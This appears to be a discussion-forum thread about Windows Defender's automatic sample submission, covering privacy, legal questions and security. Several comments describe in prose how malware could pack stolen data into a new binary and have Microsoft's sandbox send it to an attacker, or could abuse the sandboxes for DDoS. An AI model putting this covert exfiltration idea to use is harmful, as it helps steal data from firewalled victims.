"This opens interesting data leak vector for attacker and also includes some privacy concerns. It is quite common that even in isolated environments, many of the Microsoft IP address ranges are whitelisted to make sure systems will stay up to date. This enables adversary to leak data via Microsoft services which is extremely juicy covert channel."
As a user, you can just disable automatic sample submission. In fact I'm pretty sure you can set it during installation, as I've never had to go through the settings to disable it, but it's still disabled on all my installations.
But the question is, from an adversary perspective, does your victim have it disabled?
Most likely they won't, so you can use Microsoft as a mule to exfiltrate data from otherwise firewalled victims.
This is actually a smart idea. Make your spyware collect & encrypt data into a (new and unknown) binary and execute it, relying on the fact that Microsoft will exfiltrate it for you. When that binary itself is run (within MS' premises) it will then reach out to you with its embedded data.
Windows Defender on Windows 7 also submits previously unobserved binaries to Microsoft for the same reason.
Go ahead, blame Win10, though. A non-zero number of people will take your comment to heart and believe that you knew what you were talking about with their entire soul, without seeing my comment.
I am so tired of seeing communal ignorance on this topic. People believe whatever bullshit they want, if it fits the narrative they are trying to sell.
Since you brought up Windows 7, I'll point out in those days Microsoft had the decency to inherit the setting from a choice made during OS installation (but even then you had to dig a little to discern the connection): https://i.imgur.com/SpqXmod.png. You further had to visit a SpyNet enrollment screen before it collected more "advanced" metadata like filenames, location, etc: https://i.imgur.com/z3qtuxp.png
On Windows 10, even if you turn off ALL three pages of privacy-hostile options during installation: https://i.imgur.com/RjXSM6S.png
...you still wind up with a Defender that broadcasts your files: https://i.imgur.com/1M7z3nH.png
This is what I'm talking about when I complain about all the buttons and toggles to turn off just to get my OS to function the way I expect (in this case, stop indiscriminately bleeding my bits and bytes to the cloud).
The information about this isn't hidden. An operating system is complex, and thus operating system configuration is likely to be complex. Microsoft could have made things less difficult to find, you're right, and they are basing their defaults on the vast majority of people, like me, who are completely fine with doing what we can to improve their anti-malware service.
You're angry and that's fine.
Imagine the anger (and the fallout) if yet another malware worm used Windows to propagate across the world. People were absolutely LIVID last time, and there were lots of lawsuits against Microsoft for ILOVEYOU and Code Red and others of the era. The default settings you see today are a direct result of those events and other, smaller ones, like them.
So Windows Defender isn't bundled as a part of Windows 10?
It was also bundled as part of Windows 8.1, Windows 8, Windows 7, and Windows Vista on top of being available as a free download for Windows XP (and even 2000 during the beta phase).
The current form, after the Microsoft Security Essentials package was merged in, didn't come about until Windows 8 but Windows Defender as a product dates back to Microsoft's purchase of GIANT Software.
Either way you call it, XP or 8, saying Defender is a Windows 10 thing is like saying Firefox is an Ubuntu 19.04 thing. Sure, Ubuntu 19.04 does bundle Firefox, but so did many versions prior.
It's also worth noting that almost every antimalware product has an option to submit unknown binaries for analysis, and almost every one of those either enables it by default or very strongly suggests that you do so during setup to the point that I'd imagine most installations that aren't managed under corporate policy are submitting samples.
Also, other anti-malware apps typically upload novel binaries. And their test machines likely run them, with network access, for the same reasons that Microsoft does.
So this exfiltration channel may well have existed for decades. Whether it's been used or not is an open question, though.
Windows Defender, like many anti-malware apps, checks hashes of binaries. Anything that's new gets uploaded for testing.
Maybe not DDoS, but if the range is naively whitelisted, maybe something more precise due to the fact that the victim believes the environment to be isolated.
> Because of Windows Defender automatic sample submission, Beacon binary was uploaded to Redmond and Beacon called Home from there.
... and below ...
> They run the executable in an environment where network connectivity is available.
Why would they do that? To see what happens?
And it's not just Microsoft. Many anti-malware apps (now, probably most) upload binaries. And I'm guessing that many run them. Maybe even with network access.
SensorFu might want to repeat this test using other anti-malware apps.
That's actually disturbingly sneaky.
So how would one block this exploit? You can't test the malware properly without letting it reach its servers. So then you're also letting it upload its exfiltrated data. Which would likely be encrypted.
Or a group policy update to tell Defender not to upload stuff to MS.
For users, sure, try to lock down Windows. Or (my preference) just don't use it. Or don't give it network access, if it contains any information that you care about.
Does it even matter? Extrapolating from that quote: a submitted sample could make abusive network requests against the victim (from MSFT's network, which is "trusted"), as well as network requests back to the attacker's server for control and/or data collection.
I don't think disabling it really helps. It sounds like the goal is to prevent malware on your machine from ever leaking data on your machine to some external server. But even if you disable automatic sample submission, the malware on your machine could still submit a program on its own to Microsoft that leaks your data.
It's possible that they don't need it. There are fair use exemptions for reverse engineering and automated analysis. These may be the legal basis on which anti-malware research can be conducted.
'You may sue the AV company for $1 million; users who suffered from your malware will civilly sue for $100 billion, and the government will charge you with crimes and put you away for a decade. Your move.'
There's this fascinating (to me, anyway) line between "viruses" (including worms, Trojans, and similar malware) that antivirus programs will tackle, and adware/spyware that they usually don't.
The difference between the two is whether it not there's a corporation publicly taking credit for the program and suing antivirus companies for defamation over calling it a "virus".
Adware/spyware is limited in distribution methods and payload types by the letter of the law, but otherwise the two classes are functionally identical.
if microsoft copies an application from my computer without asking, then it did not legally acquire it.
malware is a different case. malware entered my computer with the permission of the malware creator. i didn't steal it from them, but it came to me willingly. hence i am allowed to analyze it, and i am allowed to delegate that task to someone else.
I'm not sure if an appropriate warning or option is given for third-party users of a computer, or if it is required for administrators to warn third-party users as such.
I'm willing to bet it is in the license agreement for Windows and Windows Defender, so you have likely allowed Microsoft to do this
There's several fair usage arguments you can make. At least three strong arguments. But to be honest this would need to be tested in the courts one way or the other.
I don't really think copyright conceptually is a very fruitful argument here. CFAA is likely stronger.
How so? Microsoft spent money implementing this copying, so the copy is clearly of value to them. Why shouldn't they pay for it?
 - https://www.reddit.com/r/Windows10/comments/8dmqdy/windows_d...
In UK there have been some changes to Fair Dealing in the last couple of years that I'm not up to date on, but I don't know of anything that would make this allowed except having an explicit license from the copyright holder.
I'm not saying you're wrong, I'm saying it's really hard to work out how this is meant to work.
Like Bo Burnham says, I guess I should lower my expectations a lot.
Marketplace Hansa was running Bitdefender, which pwned them to Europol.
> Europol has been supporting the investigation of criminal marketplaces on the Dark Web for a number of years. With the help of Bitdefender, an internet security company advising Europol's European Cybercrime Centre (EC3), Europol provided Dutch authorities with an investigation lead into Hansa in 2016. Subsequent enquiries located the Hansa market infrastructure in the Netherlands, with follow-up investigations by the Dutch police leading to the arrest of its two administrators in Germany and the seizure of servers in the Netherlands, Germany and Lithuania. Europol and partner agencies in those countries supported the Dutch National Police to take over the Hansa marketplace on 20 June 2017 under Dutch judicial authorisation, facilitating the covert monitoring of criminal activities on the platform until it was shut down today, 20 July 2017. In the past few weeks, the Dutch Police collected valuable information on high value targets and delivery addresses for a large number of orders. Some 10 000 foreign addresses of Hansa market buyers were passed on to Europol.
In this case Beacon was sandboxed for security observation, but a build could easily be sandboxed for network-unsafe testing instead. Perhaps it's issuing malformed or high-volume requests to test internal functionality, safe in the knowledge that it's not actually connected to anything, and so it becomes a DoS attack when it's launched in the wild.
Or worse, maybe it's calling home to an endpoint that does something when it gets the call. It's not hard to imagine somebody putting together a binary with any required auth baked in on the logic "this only exists on my machine", and then suddenly getting it called from Redmond as well. Best practices ought to handle that alright, but it's still an awfully surprising thing to have happen to your test build.
Create a binary that sends info when started, submit it and wait for it to send the info from Redmond to your server.
Too bad there is no return channel or you could make IP over windows update.
How many bitcoins can you mine in 30 seconds with a silly-low CPU cap?
Somewhere in the region of $5e-9 worth of bitcoins.
A while back in my company we were deploying a client management tool (think TeamViewer but with more background management and software deployment capabilities). It needed to be very easy to install, so we just had a link to an EXE file that needed to be opened by our on-site IT departments. No extra steps were required.
Imagine our surprise when we suddenly saw machines popping up that were totally unfamiliar. These were machines connecting from a Microsoft IP, and all had random (but similarly formatted) usernames. They also provided random mouse inputs. We could even take control of these machines (!) but apparently they were short lived VMs that only existed for a few minutes before being recycled.
I contacted Microsoft support because at first we thought this may be a manual process (because of the mouse inputs and the user names), and we didn't want Microsoft employees seeing user data. Afterwards I also commented to the support person that someone may use these temporary machines as an attack vector (to use as an anonymous source, or in a DDoS attack), but the ticket was closed and if I recall correctly this was deemed "working as designed".
Now I don't have to, I can just point to this thread and this comment.
This is pure arrogance - they know they have whole corporate world stuck with Office, even immediate move to Open source would take 20 years due to mostly Excel tight integration/expertise. We would all benefit from a good competition in this area...
Even if you're developing? Even if you're developing proprietary applications not for public use?
All your code are belong to us.
People look at me as if we're crazy for worrying about this possibility, even though Microsoft of 2019 is notoriously vague about how any of this works and we could be flagrantly violating multiple laws and contractual obligations if it happened.
With that said -- there's still room for due diligence. I've built systems which handle personal data, and we pretty much started with Debian minimal and worked from there. To make damn sure, we stuck them behind a whitelisted firewall. They had access only to things we allowed them to see, and only in the direction we allowed.
Interestingly, Apple's now doing sort of the opposite of this. Instead of having the end-user's computer upload all executables to Apple for analysis, Apple requires the developer send them over and have them "notarized" before they run.
It was not so much that Kaspersky was acting as malware, but that they were sending tips to the FSB.
how did the author reach to this conclusion ? is it documented somewhere ?
Wait, what? Let's say you write code that you compile using MSVC or MinGW or whatever to an .exe file.
Surely there is no way this gets automatically sent to MS?
Edit: forgot link: https://rustup.rs/
I believe MacOS 10.15 also does this because there's a massive delay the first time I run a binary compiled with clang.
Why does MS run unknown executables? On the other hand, should be a nice DDoS provider for blackhats...
If it tried to do something like a DDoS it would be identified as doing so and marked as malware, end of test.
This seems like a questionable assumption. Microsoft is in the media for being "better" these days, but doing this at all seems like bad judgement. MSFT has lawyers to win a fair use case, I'll agree to that, but large corporations don't have a lot of incentive to minimize negative externalities, because of the lawyers and money for lawyers.
The exe must have been running to be able to generate the proper encrypted payload and send it to right place. In this case ports 20 and 1025 over TCP.
Disclaimer: I am one of the people who wrote the software.
Lesson: clear pricing keeps people like me in the game
When I actually am interested enough to talk to their salespeople (and they're straightforward enough with me) they've told me it helps them target whales more easily.
They can charge a lot more to a huge Enterprise and adjust lower for SMBs.
Case in point, a large FTSE, NYSE, NASDAQ listed company with largely siloed internal departments, all with their own budgets. Your yearly budget might be $20,000 -- but they see the Inc. or Plc. with a turnover in the hundreds of millions and quote accordingly...
That situation makes for some fun sales calls.
Unknown costs, talking to other people, negotiating; these things produce trace amounts of anxiety. Anxiety I'd rather not deal with. A simple Pricing page solves this.
I'd rather spend an hour googling your competitors than contact someone for a quote.
(1) 'Enterprise' oriented software, in which case it is too expensive for you anyway (those long and personal sales trajectories, negotiations and commissions have to be recouped somehow)
(2) Not actually a product, but a Trojan horse to sell you lots of consulting and bespoke development services.
That's not only a privacy concern; it's blatant copyright infringement.
I'm not talking about invulnerable software I'm talking about the comments assuming Microsoft doesn't expect __malware testing servers__ to run scanning or DDOS malware.
This may be outdated, but you can also configure Defender to always prompt before sending:
It would be interesting to set it to always prompt and see what triggers it. There must be some level of fingerprinting done on the client (hash of the binary? network activity, etc.) that can be used to compare against known threats.
Just create a native executable in your language of choice that connects to a hardcoded address of a server you have access to and try executing it on a windows machine with sample submission enabled.
So your attack might require first controlling a swam of Windows 10 machines, in which case you might as well do it directly :P
If you're testing that your binary builds requests properly, maybe you've got it making them as fast as possible and you're running it without network permissions. Fine, until it suddenly runs with full network access and hammers whatever service you're pointing at.
Seriously, what in hell? Like always, blatant violations of users in the name of "security".
Now, if a covered medical software company accidentally let a build with accessible PHI go to Microsoft, I guess it's possible they could be HIPAA liable. But that's a pretty narrow case, and not one that's a threat to Microsoft.
Until the medical software company sues Microsoft for damages to recoup the HIPAA fine. This is probably buried in some clickwrap contract though. (IANAL; not sure how enforceable such a contract would be)
(As an aside, if they are sweeping data on such a broad scale without being transparent about it and the only authorisation for doing so is buried deep in some legal document, it would be interesting to consider whether they were not only potentially in breach of GDPR but also various criminal computer misuse laws.)
2. In business/corporate environments especially, there are many options that should be group policied by a proper functioning IT team as one of their many tasks.
It probably also allows them to do some spying on networks used by malware.